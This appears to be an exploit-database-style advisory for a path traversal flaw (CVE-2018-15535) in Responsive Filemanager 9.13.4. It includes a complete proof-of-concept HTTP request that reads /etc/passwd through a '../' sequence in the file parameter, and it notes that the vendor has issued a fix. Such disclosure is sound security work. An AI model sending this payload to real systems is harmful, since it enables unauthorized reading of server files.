vendor:
Responsive Filemanager
by:
Simon Uvarov
7.5
CVSS
HIGH
Path Traversal
22
CWE
Product Name: Responsive Filemanager
Affected Version From: 9.13.4
Affected Version To: 9.13.4
Patch Exists: YES
Related CWE: CVE-2018-15535
CPE: a:responsivefilemanager:responsive_filemanager
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: None
2018
Path Traversal Allows to Read Any File
The following request allows a user to read any file on the system. GET /filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd HTTP/1.1 Host: 192.168.5.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.5.129/filemanager/dialog.php?type=0&popup=1 X-Requested-With: XMLHttpRequest Cookie: last_position=%2F; PHPSESSID=na248cef3f937mtql67dvu8fk5 Connection: close
Mitigation:
Fixed by the vendor